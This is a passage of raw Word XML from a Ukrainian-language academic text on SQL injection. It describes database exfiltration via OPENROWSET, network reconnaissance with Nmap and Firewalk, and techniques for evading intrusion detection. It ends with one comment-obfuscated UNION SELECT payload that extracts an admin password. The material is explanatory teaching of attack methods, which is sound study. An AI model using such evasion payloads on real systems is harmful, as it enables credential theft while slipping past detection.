          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Transfer Database to Attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="005A6E5A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="005A6E5A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s Machine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w14:paraId="03112493" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="008861B4" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43B4BB52" w14:textId="6D114327" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Атакуючий може також пов’язати базу даних сервера з його власною машиною. Зробивши це атакуючий може витягнути дані з SQL сервера базу даних. Атакуючий робить це використовуючи OPENROWSET; після реплікації структури БД відбувається передача даних. Атакуючий з’єднується з віддаленою машиною по 80 порту для передачі даних.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4A270E" w14:textId="77777777" w:rsidR="0019135A" w:rsidRPr="00101F0F" w:rsidRDefault="0019135A" w:rsidP="00101F0F">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59D38A85" w14:textId="19C90F8B" w:rsidR="0019135A" w:rsidRDefault="0019135A" w:rsidP="0019135A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc30433136"/>
      <w:r w:rsidRPr="005A6E5A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="005A6E5A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network Reconnaissance Full Query</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w14:paraId="5165F799" w14:textId="4FD899F3" w:rsidR="0019135A" w:rsidRDefault="0019135A" w:rsidP="0019135A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4396D24C" w14:textId="32292E95" w:rsidR="0019135A" w:rsidRPr="00101F0F" w:rsidRDefault="0019135A" w:rsidP="00101F0F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00101F0F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Network </w:t>
      </w:r>
      <w:r w:rsidRPr="00101F0F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-CA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:r w:rsidRPr="00101F0F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (мережева розвідка) це процес тестування будь якої вразливості в комп’ютерній мережі. Однак, мережева розвідка є також основною формою мережевої атаки. Мережева розвідка може бути зменшена, але не може бути усунута. Атакуючий використовує для відображення мережі інструменти такі як </w:t>
      </w:r>
      <w:r w:rsidRPr="00101F0F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00101F0F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> і </w:t>
      </w:r>
      <w:r w:rsidRPr="00101F0F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Firewalk</w:t>
      </w:r>
      <w:r w:rsidRPr="00101F0F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> для визначення вразливостей в мережі.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF17428" w14:textId="77777777" w:rsidR="00636AF5" w:rsidRPr="00101F0F" w:rsidRDefault="00636AF5" w:rsidP="00101F0F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C9C3A13" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="005A6E5A" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="576"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc516752149"/>
      <w:bookmarkStart w:id="93" w:name="_Toc30433137"/>
      <w:r w:rsidRPr="005A6E5A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.8</w:t>
      </w:r>
      <w:r w:rsidRPr="005A6E5A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion Techniques</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
      <w:bookmarkEnd w:id="93"/>
      <w:r w:rsidRPr="005A6E5A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206CC15F" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="008861B4" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5870A553" w14:textId="26DB60DE" w:rsidR="004B547E" w:rsidRDefault="00A419FD" w:rsidP="004B547E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> і </w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intrusion</w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Detection</w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (IDS) можуть виявити SQL-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ін’єкцію базуючись на заздалегідь визначеній сигнатурі. Навіть якщо мережа включає цей безпечний периметр, атакуючий використовує техніки ухилення, щоб SQL ін’єкція була непомічена. Техніки ухилення включають шістнадцяткове кодування, маніпуляцією пробілів, вбудован</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ий коментар, кодування символів </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CD57B2" w14:textId="491FF412" w:rsidR="004B547E" w:rsidRDefault="004B547E" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69E3450E" w14:textId="4EDD2737" w:rsidR="004B547E" w:rsidRDefault="004B547E" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15364FDC" w14:textId="4D651CFC" w:rsidR="004B547E" w:rsidRDefault="004B547E" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B15BC80" w14:textId="77777777" w:rsidR="004B547E" w:rsidRPr="00D84A48" w:rsidRDefault="004B547E" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E316A2F" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00C0553F" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc516752150"/>
      <w:bookmarkStart w:id="95" w:name="_Toc30433138"/>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.8.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Evading </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>IDS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w14:paraId="78C38435" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="008861B4" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FB3DE42" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>IDS поміщується в мережу для виявлення зловмисної активності.</w:t>
      </w:r>
      <w:r w:rsidRPr="008861B4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Як правило вона заснована або на сигнатурі або аномальній моделі. Для виявлення </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, сенсор IDS поміщується в сервер баз даних для перевірки оператора SQL. Атакуючий використовує техніки ухилення, щоб приховати вхідний рядок для уникнення виявлення. Сигнатура – регулярний вираз, що описує рядок шаблону використовуючи відомі атаки. Система створює базу даних відомих атак і потім аналізує строку введення порівнюючи з базою даних під час виконання операції для виявлення атаки. Якщо будь-яка інформація відповідає сигнатур атак, присутніх в базі даних то IDS видає сигнал тривоги. Такого роду проблеми відбуваються частіше в </w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>network</w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>based</w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDS</w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (NIDS) і </w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signature</w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>based</w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NIDS</w:t>
      </w:r>
      <w:r w:rsidRPr="006132FD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Отже, атакуючий повинен бути дуже обережний і намагатися атакувати систему минаючи </w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signature</w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>based</w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00944078">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326297AB" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Техніки ухилення включають використання різних методів кодування, фрагментування пакетів, використовуючи пробіли.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3DD1F2" w14:textId="53C81C0E" w:rsidR="002F1513" w:rsidRDefault="002F1513" w:rsidP="00877BAF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE9243F" w14:textId="77777777" w:rsidR="002F1513" w:rsidRPr="008861B4" w:rsidRDefault="002F1513" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D0E552F" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00C0553F" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc516752151"/>
      <w:bookmarkStart w:id="97" w:name="_Toc30433139"/>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.8.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> In-line Comment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w14:paraId="19E6ACE4" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="008861B4" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41835EE0" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>У цій техніці, пробіл заміняється вбудованим коментарем.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DB8C1E" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">/*…..*/ використовується для розмежування багаторядкового коментаря </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9B4572" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>‘/**/UNION/**/SELECT/**/PASSWORD/**/FROM/**/USERS/**/WHERE/**/USERNAME/**/LIKE/**/’ADMIN’ - -</w:t>
      </w:r>
    </w:p>
